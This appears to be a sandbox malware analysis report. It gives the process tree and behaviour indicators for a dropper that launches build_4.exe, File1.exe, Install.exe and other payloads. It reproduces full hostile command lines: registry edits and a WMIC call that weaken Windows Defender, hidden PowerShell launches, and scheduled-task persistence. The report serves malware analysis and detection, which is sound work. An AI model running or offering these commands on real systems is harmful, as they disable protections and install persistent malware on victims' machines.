Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exeDhIGibW.exepowershell.exepid process 1216 powershell.exe 1216 powershell.exe 1216 powershell.exe 1336 powershell.exe 1336 powershell.exe 1336 powershell.exe 2480 powershell.exe 2480 powershell.exe 2480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 3116 powershell.exe 3116 powershell.exe 3116 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 4232 powershell.exe 4232 powershell.exe 4232 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3212 powershell.EXE 3212 powershell.EXE 3212 powershell.EXE 3488 powershell.exe 3488 powershell.exe 3488 powershell.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 2912 powershell.exe 2912 powershell.exe 2912 powershell.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe 4900 DhIGibW.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4912 taskkill.exe Token: SeDebugPrivilege 792 taskkill.exe Token: SeDebugPrivilege 4464 taskkill.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1336 powershell.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 4128 taskkill.exe Token: SeDebugPrivilege 4484 taskkill.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeIncreaseQuotaPrivilege 4396 WMIC.exe Token: SeSecurityPrivilege 4396 WMIC.exe Token: SeTakeOwnershipPrivilege 4396 WMIC.exe Token: SeLoadDriverPrivilege 4396 WMIC.exe Token: SeSystemProfilePrivilege 4396 WMIC.exe Token: SeSystemtimePrivilege 4396 WMIC.exe Token: SeProfSingleProcessPrivilege 4396 WMIC.exe Token: SeIncBasePriorityPrivilege 4396 WMIC.exe Token: SeCreatePagefilePrivilege 4396 WMIC.exe Token: SeBackupPrivilege 4396 WMIC.exe Token: SeRestorePrivilege 4396 WMIC.exe Token: SeShutdownPrivilege 4396 WMIC.exe Token: SeDebugPrivilege 4396 WMIC.exe Token: SeSystemEnvironmentPrivilege 4396 WMIC.exe Token: SeRemoteShutdownPrivilege 4396 WMIC.exe Token: SeUndockPrivilege 4396 WMIC.exe Token: SeManageVolumePrivilege 4396 WMIC.exe Token: 33 4396 WMIC.exe Token: 34 4396 WMIC.exe Token: 35 4396 WMIC.exe Token: 36 4396 WMIC.exe Token: SeIncreaseQuotaPrivilege 4396 WMIC.exe Token: SeSecurityPrivilege 4396 WMIC.exe Token: SeTakeOwnershipPrivilege 4396 WMIC.exe Token: SeLoadDriverPrivilege 4396 WMIC.exe Token: SeSystemProfilePrivilege 4396 WMIC.exe Token: SeSystemtimePrivilege 4396 WMIC.exe Token: SeProfSingleProcessPrivilege 4396 WMIC.exe Token: SeIncBasePriorityPrivilege 4396 WMIC.exe Token: SeCreatePagefilePrivilege 4396 WMIC.exe Token: SeBackupPrivilege 4396 WMIC.exe Token: SeRestorePrivilege 4396 WMIC.exe Token: SeShutdownPrivilege 4396 WMIC.exe Token: SeDebugPrivilege 4396 WMIC.exe Token: SeSystemEnvironmentPrivilege 4396 WMIC.exe Token: SeRemoteShutdownPrivilege 4396 WMIC.exe Token: SeUndockPrivilege 4396 WMIC.exe Token: SeManageVolumePrivilege 4396 WMIC.exe Token: 33 4396 WMIC.exe Token: 34 4396 WMIC.exe Token: 35 4396 WMIC.exe Token: 36 4396 WMIC.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 4232 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3212 powershell.EXE Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4512 WMIC.exe Token: SeIncreaseQuotaPrivilege 4512 WMIC.exe Token: SeSecurityPrivilege 4512 WMIC.exe Token: SeTakeOwnershipPrivilege 4512 WMIC.exe Token: SeLoadDriverPrivilege 4512 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exeWScript.exebuild_4.exebuild_4.execmd.execscript.execmd.execmd.execscript.execmd.execmd.execscript.execmd.exepowershell.exeFile1.exedescription pid process target process PID 2368 wrote to memory of 96 2368 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe WScript.exe PID 2368 wrote to memory of 96 2368 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe WScript.exe PID 2368 wrote to memory of 96 2368 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe WScript.exe PID 96 wrote to memory of 4212 96 WScript.exe build_4.exe PID 96 wrote to memory of 4212 96 WScript.exe build_4.exe PID 96 wrote to memory of 4212 96 WScript.exe build_4.exe PID 4212 wrote to memory of 4440 4212 build_4.exe build_4.exe PID 4212 wrote to memory of 4440 4212 build_4.exe build_4.exe PID 4212 wrote to memory of 4440 4212 build_4.exe build_4.exe PID 4440 wrote to memory of 4632 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 4632 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 4632 4440 build_4.exe cmd.exe PID 4632 wrote to memory of 856 4632 cmd.exe cscript.exe PID 4632 wrote to memory of 856 4632 cmd.exe cscript.exe PID 4632 wrote to memory of 856 4632 cmd.exe cscript.exe PID 856 wrote to memory of 2832 856 cscript.exe cmd.exe PID 856 wrote to memory of 2832 856 cscript.exe cmd.exe PID 856 wrote to memory of 2832 856 cscript.exe cmd.exe PID 4440 wrote to memory of 1660 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 1660 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 1660 4440 build_4.exe cmd.exe PID 2832 wrote to memory of 4912 2832 cmd.exe taskkill.exe PID 2832 wrote to memory of 4912 2832 cmd.exe taskkill.exe PID 2832 wrote to memory of 4912 2832 cmd.exe taskkill.exe PID 4440 wrote to memory of 4476 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 4476 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 4476 4440 build_4.exe cmd.exe PID 4476 wrote to memory of 1880 4476 cmd.exe cscript.exe PID 4476 wrote to memory of 1880 4476 cmd.exe cscript.exe PID 4476 wrote to memory of 1880 4476 cmd.exe cscript.exe PID 1880 wrote to memory of 4940 1880 cscript.exe cmd.exe PID 1880 wrote to memory of 4940 1880 cscript.exe cmd.exe PID 1880 wrote to memory of 4940 1880 cscript.exe cmd.exe PID 4440 wrote to memory of 2600 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 2600 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 2600 4440 build_4.exe cmd.exe PID 4940 wrote to memory of 792 4940 cmd.exe taskkill.exe PID 4940 wrote to memory of 792 4940 cmd.exe taskkill.exe PID 4940 wrote to memory of 792 4940 cmd.exe taskkill.exe PID 4440 wrote to memory of 1216 4440 build_4.exe powershell.exe PID 4440 wrote to memory of 1216 4440 build_4.exe powershell.exe PID 4440 wrote to memory of 1216 4440 build_4.exe powershell.exe PID 4440 wrote to memory of 2796 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 2796 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 2796 4440 build_4.exe cmd.exe PID 2796 wrote to memory of 2252 2796 cmd.exe cscript.exe PID 2796 wrote to memory of 2252 2796 cmd.exe cscript.exe PID 2796 wrote to memory of 2252 2796 cmd.exe cscript.exe PID 2252 wrote to memory of 3216 2252 cscript.exe cmd.exe PID 2252 wrote to memory of 3216 2252 cscript.exe cmd.exe PID 2252 wrote to memory of 3216 2252 cscript.exe cmd.exe PID 4440 wrote to memory of 2508 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 2508 4440 build_4.exe cmd.exe PID 4440 wrote to memory of 2508 4440 build_4.exe cmd.exe PID 3216 wrote to memory of 4464 3216 cmd.exe taskkill.exe PID 3216 wrote to memory of 4464 3216 cmd.exe taskkill.exe PID 3216 wrote to memory of 4464 3216 cmd.exe taskkill.exe PID 1216 wrote to memory of 2136 1216 powershell.exe File1.exe PID 1216 wrote to memory of 2136 1216 powershell.exe File1.exe PID 1216 wrote to memory of 2136 1216 powershell.exe File1.exe PID 2136 wrote to memory of 4216 2136 File1.exe RegAsm.exe PID 2136 wrote to memory of 4216 2136 File1.exe RegAsm.exe PID 2136 wrote to memory of 4216 2136 File1.exe RegAsm.exe PID 2136 wrote to memory of 4216 2136 File1.exe RegAsm.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe"C:\Users\Admin\AppData\Local\Temp\806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:96 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\SysWOW64\cscript.execscript.exe C:\Users\Public\make.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\Channel4.exe /F /t7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM C:\Users\Public\Channel4.exe /F /t8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"5⤵PID:1660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\cscript.execscript.exe C:\Users\Public\make.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\File1.exe /F /t7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM C:\Users\Public\File1.exe /F /t8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"5⤵PID:2600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\File1.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Users\Public\File1.exe"C:\Users\Public\File1.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4216 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\cscript.execscript.exe C:\Users\Public\make.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\Windows.exe /F /t7⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM C:\Users\Public\Windows.exe /F /t8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\Windows.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Users\Public\Windows.exe"C:\Users\Public\Windows.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4980 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1976 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:1768 -
C:\Windows\SysWOW64\cscript.execscript.exe C:\Users\Public\make.vbs6⤵PID:3876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\xarirogemi.exe /F /t7⤵PID:2368
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM C:\Users\Public\xarirogemi.exe /F /t8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:4732 -
C:\Windows\SysWOW64\cscript.execscript.exe C:\Users\Public\make.vbs6⤵PID:344
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\setup1.exe /F /t7⤵PID:4232
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM C:\Users\Public\setup1.exe /F /t8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:4612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:4404 -
C:\Windows\SysWOW64\cscript.execscript.exe C:\Users\Public\make.vbs6⤵
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\385104.exe /F /t7⤵
- System Location Discovery: System Language Discovery
PID:3652 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM C:\Users\Public\385104.exe /F /t8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:3636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\385104.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Users\Public\385104.exe"C:\Users\Public\385104.exe"6⤵
- Executes dropped EXE
PID:2768 -
C:\Users\Admin\AppData\Local\Temp\7zS60C4.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
PID:304 -
C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe.\Install.exe /QmQuZdidEuh "385104" /S8⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:1412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:3596
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:4764
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:1676
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:3012 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:4916
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
PID:3276 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:4308 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:1660
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4884 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:5100
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:856
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
- Indirect Command Execution
PID:4044 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:5040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:3192
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2060 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:1816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4396 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOYLEOfZCACcRQIJvG" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe\" c9 /LjdidcI 385104 /S" /V1 /F9⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 6849⤵
- Program crash
PID:4372
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2988
-
C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe c9 /LjdidcI 385104 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4936
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2756 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:700
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:504
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:1616 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:1676 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4764 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:4756 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4372
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:588
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2144 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:1308 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1932
-
